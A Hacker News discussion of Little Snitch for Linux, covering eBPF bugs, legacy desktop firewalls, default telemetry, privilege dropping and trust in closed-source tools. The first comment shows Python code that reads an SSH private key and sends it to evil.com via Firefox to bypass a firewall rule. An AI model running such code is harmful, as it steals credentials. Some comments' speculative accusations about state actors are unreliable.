Say I run a script `suspicious.py' and I deny this script from making any network requests. I also have firefox which is allowed to make any HTTPS requests. If suspicious.py does something like:
key = (Path.home() / '.ssh' / 'id_rsa').read_text()
subprocess.Popen(['firefox', f'https://evil.com/upload/{key}'])
Also: If an interpreter is run via `#!/bin/interpreter` in the script binary, it makes the rule for the script file path, not the interpreter. This does not work when running the script as `interpreter script`, though.
The "good" Windows firewalls like Outpost and Zone Alarm used to have features to catch this, they'd detect when a process tried to invoke or open a running process which had internet access. They'd also do things like detect when a process tried to write a startup item. This went by names like "Leak Control" but it was basically providing near-complete HIDS features with local control.
The more granular one gets the more likely they aren't really meaning to ask how to do it in the firewall layer though. E.g. if we take it further to wanting to prevent python -c "specific logic" it's clearer what you can do in the firewall is not necessarily the same as what's practical or useful.
> Error: the BPF_PROG_LOAD syscall returned Argument list too long (os error 7).
> littlesnitch.service: Consumed 3min 38.832s CPU time, 13.7G memory peak.
I have now installed Fedora in a VM (ARM64 architecture, though) and it does load, but cannot identify processes. I'm investigating this now.
The other issue seems to be with eBPF compatibility. That's a moving target and I'll investigate next. But resources are limited, I'll need some time to dig into this.
"Note: Little Snitch version 1.0.0 does not currently work with the Btrfs file system! Btrfs is used by default on Fedora, so Little Snitch does not currently identify processes on Fedora. We are working on an 1.0.1 release to fix the issue as soon as possible!"
And the second most upvoted comment is someone seriously asking if 2026 if the year of Linux desktop...
Come on, this is an absurd comment. Linux has its issues, this is not a serious example of what is keeping normal people from using Linux as a desktop OS. Normal people are not installing the first release of a privacy networking tool that requires you to OK connections.
Only on Linux you get weird bug, compilation issues, etc.
After all, you have windows, macos and then you have Linux : debian, Ubuntu, fedora, arch, opensuse. That's almost like 5 different os just for Linux.
Sure you can use flatpack and force people to download 2gb installation for something that requires 20mb on windows and macos. That excludes all of the people who don't have fiber internet.
At this point I'm convinced that those developing Linux don't want it to be an os for casuals and prefer to stay in their small, niche community. That's fine by me but it makes claim of Linux desktop year laughable, which I was referring to.
Flatpaks are easily the best gui desktop app experience for users we have today.
I wonder if the decision of Little Snitch to make the Linux version free forever was also informed by this "no way to make money selling tools on Linux" wisdom or if there was another motivation. It seems that if any tool has chances of making decent money on Linux, a product like Little Snitch, which is already well established, with working payment infrastructure would be a good candidate.
I'm as a linux user very reluctant to install anything proprietary that has such sensitive info as my network traffic and would rather use opensnitch or any other foss fork.
The same time I don't mind to pay for open-source, I donate several thousands USD per year to FOSS projects. But I guess I'm in a minority here and if you make the whole stack open-source you're not going to make many sells really.
Slightly? There are quite a few tin foil hat comments on this submission.
I tried to briefly explain a typical i-own-my-computer mindset regarding the linux monetization question from the parent comment.
I can pay for cool stuff I can trust, but the "I can trust" part is very tricky.
It's like the Nazi bar problem. You need to be vigilant to prevent the thing you rely on becoming yet another platform for Microsoft to exfil your personal data to NSA servers.
It's not that arcane.
[0]: https://en.wikipedia.org/wiki/ZoneAlarm
[1]: https://d2nwkt1g6n1fev.cloudfront.net/helpmax/wp-content/upl...
I've just found it and uploaded it to github. Looking at the code, I can see my horrible C style of the time. There's probably bugs galore.
https://github.com/JetSetIlly/Direwall
If I remember correctly, it runs as a commodity and patches the socket library. Interestingly, the socket library was not re-entrant (unusual for Amiga libraries) so I had to patch the Exec OpenLibrary() function to monitor the loading of new copies of the socket library. But it's been a long time so memories are hazy.
It'll be interesting to see if it is still compiles and runs for modern AmigaOS, if any active Amiga programmers are around to see.
It was quite insistent on the fact that it would be "noisy" at first as it queried all the programs you ran, but would then quieten down once it had been "trained". It got that across in clear, simple language.
I think it was so successful because it got the soft side of its security job right as well as the hard part. It's certainly why I recommended it to anyone at the time...
My personal computer had ZoneAlarm on it. It became ground zero for reporting about infected systems. They ignored systems they thought were save; CISCO phone system running on Windows server and other backend devices. The company then bought a few licenses to run their own laptops.
It is such a same that Microsoft destroyed _ERD Commander_ and other quality tools which assisted in the clean up.
There was simply no need for it. GNU provided most of the software, spyware was unknown.
Only since comercial vendors package for linux and bring their spyware along, the desire to inspect network rose.
- GNOME Shell (extension updates without a way to disable this, weather),
- GNOME Calculator (currency exchange rates),
- NetworkManager (periodic hotspot portal checks in most configurations),
- GDB (debuginfod enabled by default),
- Firefox (extension updates, push notifications, feature flags, telemetry, ..., some parts cannot be disabled),
- VSCodium (Open VSX callbacks even when installing extensions from disk with updates disabled, JSON schema auto-downloads, extensions making their own unsolicited requests, ...),
- Electron (dictionary updates from Google servers, no way of disabling; includes any application running on top of upstream Electron, such as Signal, Discord, etc.),
- GoldenDict (audio samples fetched from the Internet on word look-up, no way to disable)
Of course, this is nothing compared to Windows [0] and macOS [1], but the malpractice of making Internet connections without asking, by default, has unfortunately been finding its way everywhere since modems stopped making audible sounds.
Having read about PRISM and seen the leaked dashboards of Paragon Graphite (said to be used by ICE), and with LLMs bridging the gap between mass and targeted surveillance, I don't want any of this.
[0] https://github.com/microsoft/calculator/blob/ffd0519676019a0...
Which would crash (technically hang) if you blocked it. [0]
And let’s not pretend that kde wouldn’t have an extension system if it could - but it’ll never have one because implanting one in that c++ spaghetti nightmare will never happen.
But if not, I'm not criticizing GNOME in isolation here. It's just what I use and what I'm most familiar with. KDE has the same issues and it does have an extension system too. It's called KNewStuff.
Maybe some middleground of having the tool OP sent built-in would be a good option.
But it wasn't always this way, and so, I don't think it has to be. People just need to start paying attention to this.
The impact of a lot of those vulnerabilities would be mitigated if the affected programs didn't connect to the network in the first place.
As for updates in general, I really like the model adopted by Linux update managers and BSD port systems. The entire repository metadata is downloaded from a mirror and cached locally, so the search terms never leave your machine. Downloads happen from the nearest mirrors, there's no "standard" mirror software (unless rsync and Apache count?) so they don't report what was downloaded by whom back to any central system and you can always host your own. Everything is verified via GPG. And most importantly, nothing happens on its own; you're expected to run `apt/dnf update` yourself. It won't randomly eat your bandwidth on a metered connection or reveal your OS details to a public hotspot.
Simple, non-invasive, transparent, (almost) all-encompassing, and centrally configurable.
Quote from LittleSnitch:
> Little Snitch for Linux is built for privacy, not security
What's your definion of malware in this context?
Note that LibreWolf still leaves some of the stuff on for you to manually disable (dom.push.connection.enabled, extension updates).
[0] https://support.mozilla.org/en-US/kb/how-stop-firefox-making...
You're welcome.
Also with the number of remote code execution exploits that have occurred in Web browsers over the years it's hard to know for sure if what you installed hasn't been hijacked unless you spent all your time on gnu.org
Yeah...
It mostly worked exactly as you would want a desktop firewall to, and integrated nicely with Cisco VPN tech, so you could ensure Integrity was operating correctly before fully opening up the tunnel for access to corporate assets.
Simpler times.
Back when people would try to winnuke others on IRC, the Linux guys would know who sent them the packet and call them out in the channel (and then usually ban them)
A simpler time lol.
Used to use Outpost Firewall Pro, too.
ZoneAlarm otoh, was snakeoil. Programs that ran at the same privilege level (typically everything) could bypass it in various ways.
OpenSnitch must be like ten years old by now. I think also portmaster is somewhat similar too.
Back then there was also a nice ~$15 program called Net Limiter which allowed one to cap network speeds individually per program.
Also that seems irrelevant because it seems this was implemented in eBPF so no kernel modules are required.
Shooting yourself in the foot really helps to built intuition!
Playing with your router is still a pain though, especially if you don't have a device with an Ethernet port. You learn all sorts of fun things like "If you change your router's IP address you get logged out of its management at the old IP address" and "Oh, that's what subnet mask means, weird."
It can be manually configured with very detailed policies, but you have to know where to go to find those controls.
It's been a while since I used ZoneAlarm or Little Snitch, but the last time I used either one the default behavior was instead that any connection attempt or attempt to listen for which there was not a policy would result in a dialog showing all the details about what application is looking to connect to or receive connections from what as well as a variety of options for creating a policy or even not creating a policy and just deciding whether that one connection would be allowed.
Also back when I used ZoneAlarm I had dialup so the taskbar addon they had which showed realtime bandwidth usage and what applications had active connections was really useful. It also had a big red "Stop" button that would immediately disable all connections, which thinking about it in retrospect really makes me miss the more innocent days of the internet.
Default allows everything though but you could even set outbound blocking rules. Cumbersome UI and no really good visibility though.
Don't open it.
@dang
Shameless plug: for anyone who wants something fully open source and terminal-based, I maintain RustNet (https://github.com/domcyrus/rustnet). It's a bit different because it's a TUI for real-time connection monitoring with deep packet inspection, not a firewall. No blocking/rules, but it's cross-platform (Linux/macOS/Windows), the entire codebase is open, and it sandboxes itself after init via Landlock with capability dropping.
Recently I was wondering how you really have to trust something like little snitch given its a full kernel extension effectively able to MITM your whole network stack.
So I went digging (and asked some agents to deep research), and I couldn't find much interesting about the company or its leadership at all.
All a long way to say, anyone know anything about this company?
But the trust issue is still real, the daemon has to run as root because it needs to watch for new mounts and keep a table of file system roots up-to-date, even after loading all the eBPF programs. As a root process, it can technically do whatever it wants. Unless you limit it with a kind of mandatory access control (SELinux or similar).
This is the very first release and we will probably come up with a more restricted permission requirement in the future. For the moment, I try to catch up with bug reports. There seems to be more diversity in the Linux landscape than I had expected.
I maintain rustnet, a passive network monitor in the same eBPF + libpcap space, so I ran into a lot of the same issues. Wanted to share what has been working for me on the privilege side, in case any of it is useful for v2.
rustnet ships with setcap 'cap_net_raw,cap_bpf,cap_perfmon+eip' instead of setuid-root. During startup it loads the eBPF programs, opens the pcap handle, and then drops all three caps before touching any packet data. It clears the ambient set, sets PR_SET_NO_NEW_PRIVS, and applies a Landlock ruleset that restricts the filesystem to /proc plus configured log paths and blocks TCP bind/connect on 6.4+ kernels. Code is in src/network/platform/linux/sandbox/ if you want to have a look.
On the "needs to watch mounts" point, totally fair that Little Snitch needs live mount visibility, but I think it is achievable without staying UID 0:
- Watching for mount changes: poll() on /proc/self/mountinfo with POLLPRI wakes on every mount table change from a completely unprivileged process (this is what systemd and mount(8) use internally). Alternatively, an eBPF program on the mount/umount/move_mount tracepoints can be loaded at init and stream events via a ring buffer, with no continued cap cost after load. - Resolving an arbitrary PID to its binary across container mount namespaces: CAP_SYS_PTRACE is enough for that. The /proc/PID/root magic symlink does the namespace translation inline inside the kernel pathwalk, so open("/proc/12345/root/usr/bin/firefox", ...) opens the right file in the right container's view without ever calling setns(), which is what would otherwise need CAP_SYS_ADMIN (the new root).
Yes, they are indie Mac developers who have been in business for more than 20 years, and Little Snitch for Mac is beloved by many users for a long time.
What is that supposed to mean in this context?
Said motivation could be a nation state handing them $XXX million dollars
I think the type of users it attracts (techies, crypto ppl, etc) makes it worth more too.
Ben Surtees (Bartender’s original developer) burned all the good will accumulated over years in one moment. Never again can anyone trust software under that name.
There were no targets involved. There were no nation-states involved. There were no attacks involved. You might not like the new developer, but this whole discussion of a nation-state and 9 figure payoff is totally ridiculous.
What I didn’t like was the secrecy, that was a breach of user trust. Why wasn’t it announced is the problem.
No, this by itself doesn't make Little Snitch or any business worth $50M. You're dreaming. That's a crazy valuation.
Little Snitch is not a working exploit for iPhone or Android.
> I think that they would be fine with paying 50M for a userbase that has a high population of devs, admins, etc. Being able to backdoor someone like this in the right organization down the line is probably worth 50M.
No, sorry, this is absurd. A ton of products have a high population of devs, admins, etc. These are not getting acquired by intelligence agencies. Give me one example. There's nothing inherently valuable about this population.
Who is a Little Snitch customer worth 50M to attack? Name them.
If you know of someone specific you want to target who uses it, the investment could pay off.
For example, we know from your blog posts that you use LittleSnitch. Someone who wanted to target you might do a lot to spy on you by buying LittleSnitch, probably.
Think of your own apps, too. I don’t think you’d do the same that Ben Surtees did and sell everything in secret, but then again I don’t personally know you. You may have a price that I’m not aware of. For that reason alone, even as I trust the current code is not nefarious, I can never give StopTheMadness access to every website and can only use it selectively, which is inconvenient.
As I said in another comment, Bartender had no target! It was not an attack. An app was sold by one developer to another developer. End of story.
> If you know of someone specific you want to target who uses it
But you don't. And you don't in the case of Little Snitch either.
You can dream up a bunch of absurd hypothetical scenarios, but they are not the reality.
> Someone who wanted to target you
Nobody wants to target me. Nobody cares about me. I am insignificant.
The point is that it shows it can happen. You’re a browser extension developer, surely you know how often it happens that developers of popular extensions are approached by shady businesses and sometimes do even sell.
> You can dream up a bunch of absurd hypothetical scenarios, but they are not the reality.
As someone else has pointed out to you, not hypothetical.
https://news.ycombinator.com/item?id=47699068
> Nobody wants to target me. Nobody cares about me. I am insignificant.
You give yourself too little credit. I know of several developers and other people with influence who use your extensions with complete trust. Compromising you means compromising them, which means compromising even more people. Jia Tan has aptly demonstrated you don’t need to directly attack your final target, only a link in the chain, even if it looks insignificant.
Yes, developers of free extensions who sell for a pittance.
I don't have a popular extension. My extension is relatively expensive and thus unpopular. I don't have enough users to be interesting to shady businesses. My extension is more valuable to me than to anyone else, because I, one person, can make a living from it.
> As someone else has pointed out to you, not hypothetical.
That link seems a bit silly. There's a screenshot with no explanatory context whatsoever. There's a list of items, many of which look quite mundane and uninteresting. Certainly it is not suggesting acquiring the company for millions of dollars. It sounds like someone—could even be an intern for all we know—is interested in attacking the app from the outside.
I agree with tptacek: "This is clownish" https://news.ycombinator.com/item?id=13813828
> You give yourself too little credit.
No, I give myself too much credit. ;-)
> I know of several developers and other people with influence who use your extensions with complete trust. Compromising you means compromising them, which means compromising even more people.
What is the value of compromising these people? Oh noes, the CIA can now write Daring Fireball articles!
> Jia Tan has aptly demonstrated you don’t need to directly attack your final target, only a link in the chain, even if it looks insignificant.
What chain? I have no third-party dependencies. If someone can compromise Apple's operating systems, then my software or Little Snitch is the least of our worries.
I do specifically and intentionally avoid using NPM, because of frequent compromises. Little Snitch is not even JavaScript, so no worries there.
I believe you, and as a fellow indie developer trust you and your intentions and that you’re careful to not be compromised. But if I’m being honest with myself I don’t have concrete proof of any of those. So I trust but also try to limit the blast radius if anything goes wrong. Does that make sense? I think you might agree there.
Your blog helps with that trust and with understanding the human behind it.
> Certainly it is not suggesting acquiring the company for millions of dollars.
Alright, yeah, I see we’re talking a bit past each other in that regard. You’re right that’s how the conversation started (before I joined in) but I don’t care for that angle fully either. I agree there are more plausible ways to achieve the objective.
> Oh noes, the CIA can now write Daring Fireball articles!
Not sure that’d be a downgrade. Maybe they could fix the Markdown perl script, too. Joking aside, I think there would be better targets, like someone on Apple’s Passwords team.
> What chain? I have no third-party dependencies. If someone can compromise Apple's operating systems
I don’t mean it in the sense of software dependencies, but in the sense that some app you use would compromise you. You know macOS’ permissions are mostly security theatre. We know people inside Apple use third-party apps. I can imagine ways of exploiting that, given a bit more knowledge of people from inside (which could be gathered from working there for a while, trawling social media, maybe reading Gruber’s emails, …).
> I do specifically and intentionally avoid using NPM, because of frequent compromises.
Same, no argument from me there.
You seem to be waffling here between targeted and untargeted attacks.
There's a world of difference between compromising me or an Apple employee and compromising my software or Apple's software. You don't magically get the latter from the former.
Untargeted attacks are just looking for the usual stuff, e.g., money. They don't care about who the victims are or what else they have.
It would require a targeted attack to insert mallicious code into my software or into Apple's software. You claim, "I can imagine ways of exploiting that," but I don't actually believe you. If you can imagine it, then explain exactly how.
There's no evidence that anyone is targeting my software or that anyone has any reason to target my software. Even if I downloaded a typical malware app from the web, that wouldn't result in malicious code getting shipped in my software.
I'm not aware of anyone on the Apple Passwords team using my software, so if someone were trying to attack me to get to them, that's seems a bit fruitless, to use a pun. In any case, the chain from compromising me, to compromising my software releases, to compromising an Apple engineer, to compromising Apple software releases, is convoluted to the extreme and would require much more specifics than anyone has given here (or is capable of giving).
In any case, I'm quite careful—though not tin foil hat paranoid—about which software I download and run on my Mac, and I've never downloaded malware in more than 20 years as a Mac user. Obviously I'm careful about my own privacy and security, since I use Little Snitch too!
Why do you think it matters? Little Snitch is used by enough people that it would be completely worthwhile as just an asset. With an infinite budget you don't look for the exploits once you have the target; you accumulate the exploits, and use them as you get targets.
I don't know how you think these apps are useful for small-time criminals to exploit, but governments somehow wouldn't be able to figure out a use for them. It reeks of "I have nothing to hide."
Maybe they use Little Snitch just to figure out what you're running, use another exploit to get into that, get blackmail material on one of your family members through connections made from files on your computer, and offer not to release it and to donate $500K to your project (that they'll set up for you, and will come from some obscure European foundation's fund), or "invest" (with no expectation or even mechanism for getting a return) into your LLC if you insert code into your software. Or even simply accept a pull request, which will be totally deniable if the code gets caught, and the pull request eventually traced to a Chinese/Russian/Iranian/North Korean IP.
I have no idea what evidence you expect people to leave. The goal is not to leave evidence. Why would someone announce that they were interested in you or targeting you?
(Taking this reply as an excuse to write a concurring rant...)
Also, once you've compromised somebody's integrity and got them on the payroll, why not use them for other things? They can join other projects, they can sit on foundation boards, they can become tech media personalities, etc., etc....
There's nothing tinfoil about this. It's cheap and easy. You could subvert every open source project in the world for less than the cost of one fancy plane, or a few fancy missiles. The CIA went in on a crypto company, got it to weaken everyone's crypto, and likely killed the son who inherited it from the previous owner. "Nation-state buying Little Snitch" is not some crazy fantasy, it's a mundane scenario (I'm sounding like LLM today, I think.) Even though OpenSnitch could be compromised even more cheaply, they show all their code.
Also, aggressors don't just use carrots, they use sticks. The Altman sister stuff for example (true or not, works even better if it's true) certainly seems like a stick. Top of the world, then suddenly a jury (easily subverted by a state) puts you in prison or takes away control of your company, and now you're killed (or "kill yourself") in prison or otherwise. Now your widower and your sister own the company, and they say yes to everything. If my multi-billionaire brother molested me, you'd never hear about it because he would have trivially given me enough money to forget about it and him. I wouldn't be filing any lawsuit. Makes me suspect that he's being resistant to something.
You're missing the most important part of the motivation here: why in the world would a nation-state give a damn about Little Snitch, especially to the tune of $XXX million dollars?
A nation-state could pay $XXX million to your significant other to spy on you. But again, a nation-state doesn't give a damn about you.
Per user hacked, it can be very cheap¹ compared to bribing anyone. And give data/access that SO can't get.
State is not interested in you until it does. Being Jewish, Polish, Gypsy, Gay. Or just WrongThinking. Or maybe it becomes super cheap and easy to process all information?
1: it can even be free. You either give us backdoor to all your users or you rot in jail. Here's a complementary beating up or pictures of your kids, to argument our position further.
It is already a thing, at least in UK and AU [1]:
> Both countries now claim the right to secretly compel tech companies and individual technologists, including network administrators, sysadmins, and open source developers – to re-engineer software and hardware under their control, so that it can be used to spy on their users. Engineers can be penalized for refusing to comply with fines and prison; in Australia, even counseling a technologist to oppose these orders is a crime.
[1] https://www.eff.org/deeplinks/2018/12/new-fight-online-priva...
2) They are interested in software will billions of users. They are not interested in software with thousands of users.
How many users do you think Little Snitch has?
"This is clownish" https://news.ycombinator.com/item?id=13813828
> little snitch given its a full kernel extension
On macOS, don't think Little Snitch needs kernel exclaves / extensions. Apple provides userspace ("Network Extension") APIs (however limited) for apps like Little Snitch to use (instead of pf).
> effectively able to MITM your whole network stack
"MITM" means something else, anywho... if network observability (not firewall) is the primary need, cross-platform (GUI) sniffers like Sniffnet exist: https://github.com/GyulyVGC/sniffnet
This is why DoH makes me nervous. Once the embedded ad engines(cough smart tv's) figure it out, we will no longer be able to mitm our dns services. Or to put it more plainly pi-hole will stop working. An open question, Any good way to block DoH? Or are heuristics the only answer?
An unenforceable option would be to set up an independent youtube frontend. https://invidious.io/
My opinion on shorts is a little more generous, sure they are generally brain-cell destroying bottom of the barrel clickbait nonsense. But that can also be said about most of the rest of youtube. What I hate specifically is the shorts doom-scrolling interface. It turns out a "short" can still be viewed on the normal interface. So I use a browser extension to turn shorts urls into normal urls.
